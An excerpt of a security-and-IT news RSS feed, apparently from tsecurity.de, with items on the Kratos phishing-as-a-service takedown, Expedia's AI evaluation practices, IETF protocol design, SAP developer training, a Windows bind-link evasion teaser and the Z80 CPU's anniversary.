						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A global law enforcement crackdown has seized infrastructure serving the massive phishing-as-a-service (PhaaS) group Kratos, as well resulting in the arrest of an unnamed Kratos “developer and technical administrator” in Indonesia. </p>



<p class="wp-block-paragraph">The effort was managed by German law enforcement and involved agencies from the US, Indonesia and other countries.</p>



<p class="wp-block-paragraph">Although a <a href="https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2026/Presse2026/260720_PM_Kratos.html" target="_blank" rel="noreferrer noopener">German statement</a> claimed that the Kratos infrastructure “has been completely disabled” and that “Kratos-supported phishing campaigns can no longer be carried out,” cybersecurity analysts and consultants question how much of a dent in enterprise phishing activity will result, and how long it will last.</p>



<p class="wp-block-paragraph">“A server seizure and a single arrest overseas remove infrastructure, not the intellectual property,” said <a href="https://my.idc.com/getdoc.jsp?containerId=PRF004767" target="_blank" rel="noreferrer noopener">Frank Dickson</a>, group VP for security at IDC. “PhaaS kits get cloned, forked and resold routinely, and the 1,800 Kratos customers didn’t vanish. They just lost a vendor in a market where vendors get replaced fast.”</p>



<p class="wp-block-paragraph">He added, “seizing 200-plus servers and arresting the developer pulls a major supplier out of that specific niche. It doesn’t touch the broader phishing economy. For every roach that you squish, there are a hundred that you do not see.”</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/noah-m-kenney-27499a166/" target="_blank" rel="noreferrer noopener">Noah Kenney</a>, principal consultant at Digital 520, takes an even more pessimistic view, arguing that there might not even be that much of a short-term phishing slowdown. </p>



<p class="wp-block-paragraph">“What makes this different from a botnet or ransomware takedown is that the people running the attacks were never part of the organization. Kratos was just a vendor,” Kenney said. “The 1,800 customers who bought it still have their target lists, their sending infrastructure and whatever access they had already established. The tooling went dark, but the people phishing your employees last week are still working, shopping for a replacement that already exists. Enterprises should not read this as a drop in (likely) threat volume.”</p>



<p class="wp-block-paragraph">One thing that the security community seems to agree on is that Kratos was a major player in the lucrative PhaaS space. But precisely determining the percentage of PhaaS activity controlled by Kratos is impossible, given that Kratos sold their kits to others. Security researchers even disagree on what they should call Kratos kits.</p>



<p class="wp-block-paragraph">“Microsoft tracks this kit as SneakyLog, others tie it to Sneaky 2FA, and KnowBe4 disputes the lineage entirely. When the security industry cannot agree on what a kit is to be called, that is because renaming and reselling is continuous rather than something that happens after a raid,” Kenney said. “What actually changed this time is the arrest and the [shutdown of the] servers. Standing up new hosting is only a weekend of work, but replacing a developer who understood how to keep an adversary in the middle proxy stable and evasive at scale is harder.”</p>



<p class="wp-block-paragraph">IDC’s Dickson added that the biggest value from the takedown is in the information gleaned from the seized servers. </p>



<p class="wp-block-paragraph">“Kratos operated in the adversary-in-the-middle category, generating convincing fake Microsoft 365 login pages that harvest session tokens and step past MFA, the exact technique behind a lot of the business email compromise activity of the past two years,” he said. “I would love to see what law enforcement does with the customer list. That, my friend, is gold.”</p>



<p class="wp-block-paragraph">Regardless, <a href="https://www.linkedin.com/in/assafmo/" target="_blank" rel="noreferrer noopener">Assaf Morag</a>, a cybersecurity researcher at Flare, dubbed the German crackdown “symbolic,” given Kratos’ reach within phishing circles. </p>



<p class="wp-block-paragraph">He argued that the very nature of software makes it all but impossible to shut down in a meaningful way.</p>



<p class="wp-block-paragraph">“Although this is malicious infrastructure, it is still software, and modern development and deployment practices make it relatively quick to rebuild or replicate,” he said. “Demand is likely to shift to competing providers, allowing the ecosystem to recover even if this particular operation has been disrupted.”</p>



<p class="wp-block-paragraph"><a href="https://www.malwarebytes.com/blog/authors/metallicamvp" target="_blank" rel="noreferrer noopener">Pieter Arntz</a>, malware intelligence researcher at Malwarebytes, agreed that the crackdown is disruptive but not definitive. </p>



<p class="wp-block-paragraph">“This appears to be more than a routine website seizure. The reporting points to a PhaaS platform with centralized infrastructure, subscription-style customers, and Microsoft 365 session theft / MFA-bypass tooling, so taking down the backend likely hurts many downstream affiliates at once. In that sense, it is a meaningful disruption to the phishing ecosystem, not just one campaign,” Arntz said.</p>



<p class="wp-block-paragraph">But, he added, “a rebrand or partial re-emergence is plausible, which is the historical pattern for PhaaS operations. Even if the core infrastructure is gone, the code, customer lists, and operator tradecraft can survive.”</p>



<p class="wp-block-paragraph">This means that customers and affiliates can shift to other phishing kits, he said, so it’s likely that the takedown will create a temporary decline in Kratos-specific activity, but probably not a lasting reduction in phishing overall.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/fvillanustre/" target="_blank" rel="noreferrer noopener">Flavio Villanustre</a>, CISO for the LexisNexis Risk Solutions Group, also concluded that the impact of this crackdown will be short-lived. </p>



<p class="wp-block-paragraph">“For each criminal organization that is dismantled, ten new ones pop out of nowhere. Unless there is a coordinated international effort by more than a few countries, this is a whack-a-mole exercise,” he said. “These are all loosely connected individuals and akin to a lernaean hydra, with two heads growing whenever you chop off one. Their leadership emerges from their lines organically without a real center of control. This makes it almost impossible to completely eliminate these criminal organizations.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[I gave Perplexity's agentic AI 5 complex tasks to run on my Mac - and I'll do it again]]></title>
<description><![CDATA[Perplexity's Mac app offers its own agentic AI, Personal Computer, which can handle multi-step tasks on your computer from start to finish. See why the results impressed me.]]></description>
<link>https://tsecurity.de/de/3687129/it-nachrichten/i-gave-perplexitys-agentic-ai-5-complex-tasks-to-run-on-my-mac-and-ill-do-it-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687129/it-nachrichten/i-gave-perplexitys-agentic-ai-5-complex-tasks-to-run-on-my-mac-and-ill-do-it-again/</guid>
<pubDate>Wed, 22 Jul 2026 19:18:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Perplexity's Mac app offers its own agentic AI, Personal Computer, which can handle multi-step tasks on your computer from start to finish. See why the results impressed me.]]></content:encoded>
</item>
<item>
<title><![CDATA[ChatGPT, Perplexity &amp; Co.: Diese Quellen nutzen KI-Tools am häufigsten – und das ist ein Problem]]></title>
<description><![CDATA[Immer mehr Menschen nutzen KI zur Online-Suche. Aber woher stammt das Wissen, das die Tools liefern? Eine Studie hat 250.000 Antworten untersucht. Das Ergebnis: Fachartikel gehören zu den seltensten Quellen.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3686129/it-nachrichten/chatgpt-perplexity-amp-co-diese-quellen-nutzen-ki-tools-am-haeufigsten-und-das-ist-ein-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686129/it-nachrichten/chatgpt-perplexity-amp-co-diese-quellen-nutzen-ki-tools-am-haeufigsten-und-das-ist-ein-problem/</guid>
<pubDate>Wed, 22 Jul 2026 13:32:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Immer mehr Menschen nutzen KI zur Online-Suche. Aber woher stammt das Wissen, das die Tools liefern? Eine Studie hat 250.000 Antworten untersucht. Das Ergebnis: Fachartikel gehören zu den seltensten Quellen.
<a href="https://t3n.de/news/chatgpt-perplexity-co-diese-quellen-nutzen-ki-tools-am-haeufigsten-und-das-ist-ein-problem-1754013/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Studie verrät: Diese Quellen nutzen ChatGPT und Co. für ihre Antworten]]></title>
<description><![CDATA[Der Beitrag Studie verrät: Diese Quellen nutzen ChatGPT und Co. für ihre Antworten erschien zuerst beim Online-Magazin BASIC thinking. Über unseren Newsletter UPDATE startest du jeden Morgen bestens informiert in den Tag.
Immer mehr Menschen lassen sich Fragen von ChatGPT, Google AI Overviews ode...]]></description>
<link>https://tsecurity.de/de/3685207/it-nachrichten/studie-verraet-diese-quellen-nutzen-chatgpt-und-co-fuer-ihre-antworten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685207/it-nachrichten/studie-verraet-diese-quellen-nutzen-chatgpt-und-co-fuer-ihre-antworten/</guid>
<pubDate>Wed, 22 Jul 2026 05:50:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/07/22/ki-chatbots-antworten-quellen/">Studie verrät: Diese Quellen nutzen ChatGPT und Co. für ihre Antworten</a> erschien zuerst beim Online-Magazin <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Über <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a> startest du jeden Morgen bestens informiert in den Tag.</p>
<p>Immer mehr Menschen lassen sich Fragen von ChatGPT, Google AI Overviews oder Perplexity beantworten, anstatt selbst zu recherchieren. Doch woher stammen diese Antworten eigentlich? Eine neue Studie mit 250.000 ausgewerteten Antworten liefert erstmals konkrete Zahlen zu den Quellen von KI-Modellen. Die Suche nach Informationen im Internet hat sich durch Künstliche Intelligenz grundlegend verändert. Vor einiger […]</p>
<p>Der Beitrag <a href="https://www.basicthinking.de/blog/2026/07/22/ki-chatbots-antworten-quellen/">Studie verrät: Diese Quellen nutzen ChatGPT und Co. für ihre Antworten</a> erschien zuerst auf <a href="https://www.basicthinking.de/blog">BASIC thinking</a>. Folge uns auch auf <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV0poYzJsamRHaHBibXRwYm1jdVpHVXZZbXh2WnlnQVAB" target="_blank">Google News</a> und <a href="https://flipboard.com/@BASICthinking" target="_blank">Flipboard</a> oder abonniere <a href="https://www.basicthinking.de/blog/update/" target="_blank">unseren Newsletter UPDATE</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Martin Thompson: Why in Building Protocols, Like Code, Starting Over Is Dumb]]></title>
<description><![CDATA[Today, the IETF held the CURRENT BoF,
where the goal was to develop a new protocol.
That protocol would be substantially like TLS,
reusing its record layer and basic structure,
but it would drop in MLS for key exchange.
This is somewhere between a pretty bad idea
and a horrible idea.
The wholesal...]]></description>
<link>https://tsecurity.de/de/3684807/tools/martin-thompson-why-in-building-protocols-like-code-starting-over-is-dumb/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684807/tools/martin-thompson-why-in-building-protocols-like-code-starting-over-is-dumb/</guid>
<pubDate>Tue, 21 Jul 2026 22:58:58 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Today, the IETF held the CURRENT BoF,
where the goal was to develop a new protocol.
That protocol would be substantially like TLS,
reusing its record layer and basic structure,
but it would drop in MLS for key exchange.</p>
<p>This is somewhere between a pretty bad idea
and a horrible idea.</p>
<p>The wholesale replacement of a huge chunk of protocol architectures
is a hallmark of a lot of the AI-generated protocol proposals
that have flooded the IETF.
A small blemish is identified,
then the fix is a whole new protocol,
or a major piece of surgery.
No regard for the wisdom of Chesterton’s Fence
or the accumulated knowledge and usefulness embodied in what exists.</p>
<p>Experienced engineers know that rewriting a code module
is not something you do lightly.
There’s lots of literature out there about why this is a bad idea generally,
and some emerging discussion about how AI might just change that.</p>
<p>The reasons not to rewrite a software component still largely apply
to a protocol component.
The reasons that AI might make it easier to do that safely, less so.
Protocols are different.</p>
<h3>Wholesale Change Will Miss Use Cases</h3>
<p>Just like with a code change,
a protocol component that changes will miss use cases
that people really care about.</p>
<p>The usual concerns with code apply:</p>
<ul>
<li>The existing features you know about and can test for
can be handled.</li>
<li>The existing problems you know and care about can be fixed.</li>
<li>You inevitably introduce brand-new problems.</li>
<li>The existing features you don’t know about
get lost.</li>
</ul>
<p>Unlike code changes, you probably don’t have a test case
for existing features that you didn’t know about.
We found that with HTTP/2,
where a number of use cases got lost in the process
of “upgrading” HTTP.</p>
<p>In HTTP/1.1,
performing client authentication
in the middle of request was possible.
Losing that capability in HTTP/2
affected few enough people
that it was not badly damaging for the ecosystem.
It still sucked.</p>
<p>A lot of work was done to try to find these issues,
but we did not learn about these problems until fairly late in the process.</p>
<p>Proposing a protocol change means asking a whole lot of other people,
many of whom are not invested in your goals,
to do that work.</p>
<p>Changing a protocol by replacing a chunk of it,
no matter how much care is taken,
either asks the entire ecosystem to change with you.</p>
<p>That means asking everyone to move with you.
If they don’t, you are not changing the protocol,
you are forking it.</p>
<h3>Forking A Protocol Destroys Interoperability</h3>
<p>The real value of having a protocol like TLS
is that a great many things can all talk to each other.</p>
<p>Forking a protocol –
and sometimes profiling a protocol, a subject for another post –
destroys that.
You now have two ways to achieve the same goal,
and a choice to join one of two clubs.
You can join both, but that means constantly translating back and forth,
something that can only get harder over time
as protocol semantics diverge.</p>
<p>And yes, in case you were asking,
this applies to the entirety of the IETF IoT sphere,
which has parallel HTTP, TLS, and other analogues.
Ostensibly, these address the needs of highly constrained hardware,
but the cost is an ecosystem cut off from the mainstream.</p>
<h3>But Fixing Protocols Is Hard</h3>
<p>Yes, existing protocols come with baggage
or technical debt.
Maybe they aren’t perfectly optimized for your use.</p>
<p>The value that an existing protocol carries
is that you are sharing the burden of its maintenance
with a great many more people.
Fixing it, maybe by adding extensions to support your needs,
comes with opportunities to improve the protocol
even beyond that immediate need.
Every change is a chance to work off some of the accumulated cruft.</p>
<p>Major refreshes, like the TLS 1.3 reworking,
cleared out a ton of cruft in the process.
You get to benefit from the work that others do to improve that protocol too.</p>
<h3>Do the Work</h3>
<p>It is hard to be a responsible steward for the fabric of the Internet.
We do it because it is worthwhile.
Ignoring the lessons of the past is not helpful.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Evals are the new PRD, Expedia’s AI chief tells VB Transform 2026]]></title>
<description><![CDATA[“The new PRD are the evals,” Xavi Amatriain, Expedia Group’s first chief AI and data officer, told the VB Transform 2026 audience last week in Menlo Park. “So basically, you encode what you want the product to do through your evals, which might include red teaming evals and all kinds of other thi...]]></description>
<link>https://tsecurity.de/de/3684604/it-nachrichten/evals-are-the-new-prd-expedias-ai-chief-tells-vb-transform-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684604/it-nachrichten/evals-are-the-new-prd-expedias-ai-chief-tells-vb-transform-2026/</guid>
<pubDate>Tue, 21 Jul 2026 20:19:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>“The new PRD are the evals,” Xavi Amatriain, <a href="https://www.expediagroup.com/en-us">Expedia Group’s</a> first chief AI and data officer, told the <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a> audience last week in Menlo Park. “So basically, you encode what you want the product to do through your evals, which might include red teaming evals and all kinds of other things, which already have a bunch of security requirements. So, you already embed that into the PRD and the product design document before you even start coding.”</p><p>He pushed it further. “With AI-assisted or AI-generated code, that’s gonna be the future. It’s like all your thinking is gonna go into the evals.”</p><p>Amatriain served as VP of AI and Compute Enablement at Google across the platforms powering Gemini and Google Search before his December 2025 appointment at Expedia. He's mentored talent who went on to found Perplexity and Scale AI. </p><p>VentureBeat’s <a href="https://venturebeat.com/orchestration/enterprise-ai-is-entering-an-evaluation-gap-agents-are-gaining-autonomy-faster-than-companies-can-verify-them">VB Pulse research on the evaluation gap</a> reinforced the stakes. Sixty-six percent of the 157 enterprises surveyed already permit some production deployment without human review or are building toward it within the next 12 months, yet only 5% fully trust the automated evaluations that would make that decision. Half have shipped an agent that passed internal evals but then failed with a real customer.</p><h2><b>Don’t let guardrails get in the way of feedback</b></h2><p>“The more guardrails and artificial business rules and sort of rules that you put into the system, the worse off,” Amatriain said. “Not only because they’re brittle, but also because they actually mess up with the feedback loop. You are actually biasing the user and the feedback you get from the user, and then you’re learning that in the wrong way.” He called guardrails “a necessary evil” and said the goal is to minimize their impact over time.</p><p>Not everyone at Transform agreed. Other speakers argued during the event that the highest-risk actions still demand very firm guardrails.</p><p>Expedia governs AI through three layers instead. Principles come first, communicated broadly. “I like to encode at a very high level how I expect decisions to be made, because in a large organization you’re gonna have a lot of distributed decision making,” Amatriain said. “And sometimes, if you’re lucky enough, those principles might be embedded in your culture. But most of the time, my experience has been they’re not.” The processes and tools that enforce them follow. “Principles look really nice on a picture on some wall, but you need to then give them teeth,” he said. Automation sits on top of both.</p><p>In practice, this plays out through what Expedia calls agent release toll gates, checkpoints calibrated to risk. “Governance needs to correlate to the risk,” Amatriain said. “And if you have something that is low risk, you don’t need too much governance to get in the way. But if there’s a lot of risk, then you need more governance. That can be encoded.” The toll gates tie evaluation rounds, red teaming, and security review to each agent’s risk level, and <a href="https://venturebeat.com/orchestration/what-billions-of-ai-predictions-taught-expedia-before-the-age-of-ai-agents">the checks shift from recommended to required as the stakes climb</a>. </p><h2>Specialized agents over monolithic intelligence</h2><p>“Even when I was at Google, I was like, I don’t believe in AGI as sort of like a singleton and a unified sort of like single model,” Amatriain told the audience. “I think it’s much better to think of it as composition, sort of like having specialized agents that are very good at some task and then composing the system out of those specialized agents.”</p><p>Expedia’s architecture starts at the component level. Tools compose into skills, skills assemble into sub-agents, and sub-agents get orchestrated into the full agentic system. “You need to have those principles that are unified that talk about things like what is the tone that we’re using, how are we addressing the user, how are we passing context, memory,” he said. “All of that needs to be thoroughly designed.” He framed this as a systemic design problem. “It’s not about the model, it’s not about a specific solution, it’s about how you’re designing the system.”</p><p>Amatriain argued that scoping each agent narrowly also makes the system easier to secure, since teams can evaluate and lock down individual agents in isolation before composing them.</p><h2>When the user must keep the final click</h2><p>Travel pricing changes in real time, flight availability shifts minute to minute, and hotel reviews routinely contradict what suppliers claim. Amatriain described a system that blends retrieval-augmented generation with direct API tool calls, choosing the approach based on latency. “If the user asks you a question like, how much does a four star hotel usually cost in Chicago in July, you don’t expect the agent to take two minutes to answer that question,” he said. “You expect an immediate answer because that answer can be cached and it doesn’t need real-time information.” A pet-friendly four-star near Lake Michigan with a pool might justify a 30-second reasoning window.</p><p>“The supplier might be saying, yeah, we have a great swimming pool, but then we also have the reviews from the travelers and we actually see there’s two reviews that say the swimming pool was not great or was not open after 6 p.m.,” Amatriain explained. A generic chatbot, he added, would only surface what a supplier self-reports, while Expedia cross-references against its own review corpus.</p><p>“We don’t want the agent to book the hotel or to buy you a plane ticket for you,” Amatriain said. “That’s something that the user has to have the agency. And the agent can recommend, can suggest, can discuss with you, but you’re gonna have to hit that click. And that’s non-negotiable.” That constraint, he argued, is also a security decision. “Once you establish those design principles, you also don’t need the guardrail because otherwise you’re gonna have to put all those guardrails in after the fact.”</p><h2>The next attackers will be other AI systems</h2><p>“Security needs to be a principle that is shifted as left as possible and as part of the design itself,” Amatriain said in response to an audience question. “And usually when you need a guardrail is because you’ve not thought about it early on.”</p><p>A second audience member pressed for lessons learned from production. Amatriain described a feedback loop where monitoring signals flow back into the eval suite. “You can almost automate the whole cycle,” he said. “But having that whole feedback loop from real signals, from your operating AI system, all the way into being reported and fixed as quickly as possible is going to become essential.”</p><p>Amatriain's toll gates are a bet that governance calibrated to risk can stay ahead of that feedback loop. VentureBeat’s separate June <a href="https://venturebeat.com/security/shared-api-keys-expose-ai-agent-fleets-venturebeat-research">Pulse survey on agent security</a>, drawn from 107 enterprises, shows how thin that margin is. More than half, 54 percent, have already had an agent security incident or near-miss. Fifty-nine percent plan to adopt, add, or replace agent security tooling within 12 months, and 29% plan to move this quarter. Incident rates climb with organization size, reaching 63% among enterprises with more than 1,000 employees versus 49% for companies with 101 to 1,000. And sandbox isolation, the one post-breach control that limits damage, drops from 35% adoption at the smaller companies to just 20 percent at the largest.</p><p>Amatriain warned that threats will increasingly come from other AI systems. “You’re gonna get threats coming not only from humans but also from other external agentic systems that are really powerful, and they’re gonna be poking at everything you’re doing. And as soon as you detect something, it’s not only about the detection, but the time to fix becomes essential here.”</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP developers face education debt, user group warns]]></title>
<description><![CDATA[Many enterprises are investing tens of millions in modernizing their SAP landscapes, but are often underestimating a crucial factor for success, the training of their own developers, according to the German-Speaking SAP User Group, DSAG.



The user association urges CIOs to treat the continuing ...]]></description>
<link>https://tsecurity.de/de/3684227/it-nachrichten/sap-developers-face-education-debt-user-group-warns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3684227/it-nachrichten/sap-developers-face-education-debt-user-group-warns/</guid>
<pubDate>Tue, 21 Jul 2026 17:50:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Many enterprises are investing tens of millions in modernizing their SAP landscapes, but are often underestimating a crucial factor for success, the training of their own developers, according to the German-Speaking SAP User Group, DSAG.</p>



<p class="wp-block-paragraph">The user association urges CIOs to treat the continuing education of SAP developers not as a voluntary training measure but as a strategic investment program in a new <a href="https://impulsant.dsag.de/wp-content/uploads/2026/07/CIO-Upskilling.pdf" target="_blank" rel="noreferrer noopener">report on upskilling</a> [PDF, in German]. Well-trained developers are essential for building stable, maintainable in-house projects without accumulating technical debt, but without continuing education during the upgrade to S/4HANA, the potential of the new technologies will remain untapped, it warned.</p>



<h2 class="wp-block-heading">Outdated expertise becomes a project risk</h2>



<p class="wp-block-paragraph">As the authors explain, while many ABAP developers have decades of experience with SAP R/3 or ECC and possess extensive process knowledge, development paradigms have fundamentally changed with S/4HANA, Clean Core, and <a href="https://www.cio.com/article/189599/sap-doubles-down-on-citizen-developer-strategy.html#:~:text=There%E2%80%99s%20also%20a,cloud%2C%E2%80%9D%20says%20Mueller.">ABAP Cloud</a>.</p>



<p class="wp-block-paragraph">In the long term, this threatens to lead to poor architectural decisions, time-consuming workarounds, and in-house developments that will need to be maintained with every release, according to DSAG. Many business consultants, too, are still relying too heavily on classic GUI transactions and not taking modern Fiori technologies sufficiently into account.</p>



<p class="wp-block-paragraph">The result is what the SAP user group refers to as “skills debt.” This debt remains invisible at first but later becomes apparent in the form of longer projects, rising maintenance costs, and a growing dependence on external service providers.</p>



<h2 class="wp-block-heading">Skill building must start before the project</h2>



<p class="wp-block-paragraph">The DSAG authors view the timing of training as particularly critical. Those who wait until an ongoing S/4HANA migration project is underway to begin building expertise significantly increase the project risk. A lack of knowledge about CDS, RAP, or Fiori leads to architectural decisions that must later be corrected at great expense. At the same time, the necessary learning effort can hardly be managed alongside day-to-day business operations.</p>



<p class="wp-block-paragraph">But even after the migration is complete, SAP developers must continue their training, according to DSAG. The authors warn that anyone who continues to work as they did on ECC will miss out on the opportunities offered by current SAP technologies — even if everything still works technically. At the same time, they can immediately apply what they’ve learned, which helps solidify their new knowledge.</p>



<h2 class="wp-block-heading">AI no replacement for developer expertise</h2>



<p class="wp-block-paragraph">While <a href="https://www.cio.com/article/4197428/sap-study-ai-pays-off-but-governance-is-lagging-behind.html">AI tools can generate and explain code</a>, this requires that developers be able to evaluate the results from a technical perspective, and according to DSAG the same applies to development in the SAP environment: “Only those who understand what constitutes good SAP code can use AI as an accelerator,” the authors write. Otherwise, AI acts as a risk amplifier and, in the worst case, merely accelerates the accumulation of technical debt.</p>



<p class="wp-block-paragraph">The prerequisites for successful AI deployment are solid software engineering knowledge, automated testing, and an understanding of modern SAP development.</p>



<h2 class="wp-block-heading">DSAG’s five recommendations</h2>



<p class="wp-block-paragraph">DSAG recommends that CIOs firmly integrate continuing education into their transformation strategy with five measures:</p>



<ul class="wp-block-list">
<li>defining mandatory learning paths for different roles, such as ABAP, CAP, or integration developers, as well as business consultants,</li>



<li>providing suitable sandbox and test environments,</li>



<li>mandatorily including training time in capacity planning,</li>



<li>coordinating training schedules with migration and modernization projects, and</li>



<li>using existing DSAG guidelines as a reference framework for development.</li>
</ul>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft is moving another Outlook feature behind a Copilot paywall]]></title>
<description><![CDATA[Microsoft is retiring Outlook's free Meeting Insight feature in the coming months. Its replacement, "Prepare for this meeting," requires a paid Microsoft 365 Copilot license.]]></description>
<link>https://tsecurity.de/de/3681794/windows-tipps/microsoft-is-moving-another-outlook-feature-behind-a-copilot-paywall/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681794/windows-tipps/microsoft-is-moving-another-outlook-feature-behind-a-copilot-paywall/</guid>
<pubDate>Mon, 20 Jul 2026 19:06:57 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft is retiring Outlook's free Meeting Insight feature in the coming months. Its replacement, "Prepare for this meeting," requires a paid Microsoft 365 Copilot license.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows Bind Link Abuse Lets Attackers Blind EDR and Bypass AMSI, AppLocker, and Sysmon]]></title>
<description><![CDATA[Windows defenders are facing a new way for attackers to hide activity after gaining administrator access. The technique abuses Windows bind links, a legitimate feature that redirects one file path to another without changing the original file on disk. Rather than dropping a visible replacement fi...]]></description>
<link>https://tsecurity.de/de/3681692/it-security-nachrichten/windows-bind-link-abuse-lets-attackers-blind-edr-and-bypass-amsi-applocker-and-sysmon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681692/it-security-nachrichten/windows-bind-link-abuse-lets-attackers-blind-edr-and-bypass-amsi-applocker-and-sysmon/</guid>
<pubDate>Mon, 20 Jul 2026 19:00:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows defenders are facing a new way for attackers to hide activity after gaining administrator access. The technique abuses Windows bind links, a legitimate feature that redirects one file path to another without changing the original file on disk. Rather than dropping a visible replacement file or modifying security software, an attacker can make a […]</p>
<p>The post <a href="https://cybersecuritynews.com/windows-bind-link-abuse-lets/">Windows Bind Link Abuse Lets Attackers Blind EDR and Bypass AMSI, AppLocker, and Sysmon</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zilog Z80 8-Bit CPU Turns 50, Open-source Replacement Heads To Drop-in DIP40 Silicon]]></title>
<description><![CDATA[An anonymous reader shared this report from Tom's Hardware:


The Zilog Z80 has just turned 50 years old. This iconic 8-bit processor first went on sale in July 1976 and stayed in production for 48 years until Zilog, now a Littelfuse subsidiary, stopped accepting orders in June 2024. However, the...]]></description>
<link>https://tsecurity.de/de/3680196/it-security-nachrichten/zilog-z80-8-bit-cpu-turns-50-open-source-replacement-heads-to-drop-in-dip40-silicon/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680196/it-security-nachrichten/zilog-z80-8-bit-cpu-turns-50-open-source-replacement-heads-to-drop-in-dip40-silicon/</guid>
<pubDate>Mon, 20 Jul 2026 03:08:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader shared this report from Tom's Hardware:


The Zilog Z80 has just turned 50 years old. This iconic 8-bit processor first went on sale in July 1976 and stayed in production for 48 years until Zilog, now a Littelfuse subsidiary, stopped accepting orders in June 2024. However, there's an open-source replacement closer than ever to shipping in the chip's original 40-pin DIP package thanks to community-funded fabrication... 

The chip powered the ZX Spectrum, TRS-80, MSX machines, Nintendo's Game Boy, Sega's Master System, the Pac-Man arcade cabinet, and Texas Instruments' graphing calculators, then shipped in industrial controllers for decades after home computing moved on to more powerful successors. Zilog's end-of-life notice, dated April 15, 2024, told customers its wafer foundry was discontinuing support for the Z84C00 family, and last-time-buy orders closed that June. 
However, Renaldas Zioma's FOSS Z80 project, launched shortly after the end-of-life notice, now has working silicon. The first version, fabbed on SkyWater's 130nm node through Tiny Tapeout 7 on a die of just 0.064mm(2), has been confirmed as functional via the project's GitHub repository. A QFN64 version with all 40 pins exposed followed on the Efabless CI2406 shuttle, two further runs then went through IHP's 130nm process, and the current run targets the classic DIP40 form factor using chip-on-board assembly on GlobalFoundries' 180nm GF180MCU node via Wafer.Space. The end goal here is to fab a drop-in replacement for machines like the ZX Spectrum and RC2014 kits... 

Zilog is trimming the Z80's official successor line as well. A product change notification from last October put the eZ80L92, along with several Z8F-series microcontrollers, on end-of-life, citing "little to no demand..." [T]he pipelined eZ80 architecture, introduced in 2001 and still inside TI's current TI-84 Plus CE calculators, otherwise remains in Zilog's catalog. 





In 1999 Slashdot was calling Zilog's updated eZ80 "one of the fastest 8-bit CPUs available today, executing code 4 times faster than a standard Z80 operating at the same clock speed." 

Slashdot headline from 2001: Zilog To File For Chapter 11.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Zilog+Z80+8-Bit+CPU+Turns+50%2C+Open-source+Replacement+Heads+To+Drop-in+DIP40+Silicon%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F20%2F0046231%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F07%2F20%2F0046231%2Fzilog-z80-8-bit-cpu-turns-50-open-source-replacement-heads-to-drop-in-dip40-silicon%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/07/20/0046231/zilog-z80-8-bit-cpu-turns-50-open-source-replacement-heads-to-drop-in-dip40-silicon?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
